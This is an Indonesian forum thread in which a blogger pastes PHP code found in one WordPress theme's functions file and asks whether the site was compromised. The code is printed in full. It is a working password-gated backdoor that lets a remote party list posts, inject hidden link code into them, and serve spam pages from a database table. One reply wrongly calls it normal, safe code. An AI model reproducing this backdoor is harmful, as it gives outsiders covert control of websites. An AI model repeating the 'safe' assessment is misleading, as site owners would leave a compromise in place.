1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

[Tanya] Ini kode apa gan, ada di theme function, apa blog ane kena inject?

Discussion in 'Blog/CMS Stuff' started by thekrim, Mar 29, 2017.

Tags:
  1. thekrim

    thekrim Super Hero

    Joined:
    Jul 10, 2011
    Messages:
    2,360
    Likes Received:
    201
    Location:
    Indonesia
    Ane cuma mau tanya gan, ni kode script ada di theme function
    Dari beberapa blog yg pake theme sama cuma blog ini yg theme functionnya ada script ini
    Code:
    <?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '06865f4b120bf8e77400b05475880f21'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';
                           
                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }
                           
                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;
               
                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.esc_sql($_REQUEST['id']).'"');
                           
                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . esc_sql($post_content) . '" WHERE `ID` = "' . esc_sql($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;
               
                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.esc_sql($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.esc_sql($_REQUEST['url']).'", `title` = "'.esc_sql($_REQUEST['title']).'", `keywords` = "'.esc_sql($_REQUEST['keywords']).'", `description` = "'.esc_sql($_REQUEST['description']).'", `content` = "'.esc_sql($_REQUEST['content']).'", `full_content` = "'.esc_sql($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.esc_sql($_REQUEST['title']).'", `keywords` = "'.esc_sql($_REQUEST['keywords']).'", `description` = "'.esc_sql($_REQUEST['description']).'", `content` = "'.esc_sql(urldecode($_REQUEST['content'])).'", `full_content` = "'.esc_sql($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;
               
                default: print "ERROR_WP_ACTION WP_URL_CD";
            }
           
        die("");
    }

   
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.esc_sql( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.esc_sql($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }
           
        exit;
    }


?>
    Ane kurang tau apa dulu masukin script ini atau gimana, lupa juga
    Atau apa blog ane kena inject?
     
    thekrim, Mar 29, 2017
    #1
  2. hatoRI

    hatoRI Ads.id Pro

    Joined:
    Nov 15, 2015
    Messages:
    415
    Likes Received:
    18
    aman kok gak, itu normal kode nya
     
    hatoRI, Mar 29, 2017
    #2
  3. thekrim

    thekrim Super Hero

    Joined:
    Jul 10, 2011
    Messages:
    2,360
    Likes Received:
    201
    Location:
    Indonesia
    Itu kode script apa ya gan, ane bener2 buta html kayak gitu?
    Soalnya ada 4 blog pake theme sama, cuma blog ini kok theme function ada tambahan kode itu
    Ini blog lama ga keurus jadi lupa lupa
    Kalo aman, mungkin dulu ane pernah masukin script itu, tapi buat apa ya? :hmm2:
     
    thekrim, Mar 29, 2017
    #3
  4. hatoRI

    hatoRI Ads.id Pro

    Joined:
    Nov 15, 2015
    Messages:
    415
    Likes Received:
    18
    itu buat inject detail meta ke index page dari database gan
     
    hatoRI, Mar 29, 2017
    #4
  5. thekrim

    thekrim Super Hero

    Joined:
    Jul 10, 2011
    Messages:
    2,360
    Likes Received:
    201
    Location:
    Indonesia
    oh gitu ya
    tapi kalo aman ya gapapa lah, tapi ane hapus aja tuh kode soalnya ngeganjel di hati
    makasih gan infromasinya
     
    thekrim, Mar 29, 2017
    #5
  6. Gianbizz

    Gianbizz Hero

    Joined:
    Jun 26, 2012
    Messages:
    644
    Likes Received:
    79
    Abis dihapus cek & ricek blog nya gan sapa tau ngaruh
    Bisa jadi itu bawaan dri plugin yg agan install
    takutnya pluginnya malah ga fungsi
     
    Gianbizz, Mar 29, 2017
    #6
  7. thekrim

    thekrim Super Hero

    Joined:
    Jul 10, 2011
    Messages:
    2,360
    Likes Received:
    201
    Location:
    Indonesia
    iya gan ke depannya ane pantau apa ngaruh apa ga
    4 blog ini plugin sama theme sama, ga neko2 pluginnya
     
    thekrim, Mar 29, 2017
    #7

Share This Page